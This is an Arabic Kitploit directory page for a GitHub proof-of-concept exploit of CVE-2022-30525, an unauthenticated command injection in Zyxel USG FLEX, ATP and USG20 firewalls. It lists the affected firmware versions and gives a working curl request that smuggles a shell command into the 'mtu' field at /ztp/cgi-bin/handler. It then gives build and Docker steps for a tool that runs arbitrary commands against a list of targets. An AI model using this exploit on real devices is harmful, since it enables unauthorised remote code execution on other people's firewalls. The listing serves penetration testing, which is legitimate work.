Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2022-30525 — POC أولي لـ CVE-2022-30525 | Kitploit
أدوات/GitHubGitHub/iveresk/cve-2022-30525
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubiveresk/cve-2022-30525

cve-2022-30525

POC أولي لـ CVE-2022-30525

عرض المستودع
3منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-30525 بقلم 1vere$k

Rapid7 اكتشفت وأبلغت عن ثغرة تؤثر على جدران Zyxel النارية التي تدعم التوفير الصفري (ZTP)، والتي تشمل سلسلة ATP، وسلسلة VPN، وسلسلة USG FLEX (بما في ذلك USG20-VPN وUSG20W-VPN). تسمح الثغرة، المعروفة باسم CVE-2022-30525، لمهاجم غير مصادق وعن بعد بتنفيذ تعليمات برمجية عشوائية كمستخدم nobody على الجهاز المتأثر.

الجدول التالي يحتوي على الطرازات المتأثرة وإصدارات البرامج الثابتة.

الطراز المتأثر USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 حتى ZLD5.21 التصحيح 1 USG20-VPN, USG20W-VPN ZLD5.10 حتى ZLD5.21 التصحيح 1 ATP 100, 200, 500, 700, 800 ZLD5.10 حتى ZLD5.21 التصحيح 1

سلسلة VPN، التي تدعم أيضًا ZTP، ليست عرضة للخطر لأنها لا تدعم الوظيفة المطلوبة.

الطرازات المتأثرة عرضة لحقن الأوامر عن بعد بدون مصادقة عبر واجهة HTTP الإدارية. يتم تنفيذ الأوامر كمستخدم nobody. يتم استغلال هذه الثغرة عبر المسار /ztp/cgi-bin/handler.

مثال curl

root@kitploit:~
curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler

الاستخدام

يجب إنشاء ملف cmds حيث يمكنك إضافة الأوامر التي سيتم تنفيذها عبر البرنامج بالتنسيق التالي:

root@kitploit:~
bash -c "command#1 && command#2 && etc."

For example:
bash -c "ping 8.8.8.8"

Golang

root@kitploit:~
1. git clone https://github.com/iveresk/cve-2022-30525.git
2. cd cve-2022-30525
3. go build cve-2022-30525.go -o /cve-2022-30525
4. chmod +x cve-2022-30525
5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]

Dockerfile

root@kitploit:~
docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525

حيث INPUT_FILE هو عنوان URL مستهدف أو ملف يحتوي على قائمة بالأهداف.

اتصال

يمكنك التواصل معي بحرية عبر Keybase لأي تفاصيل.

تنزيل الأداة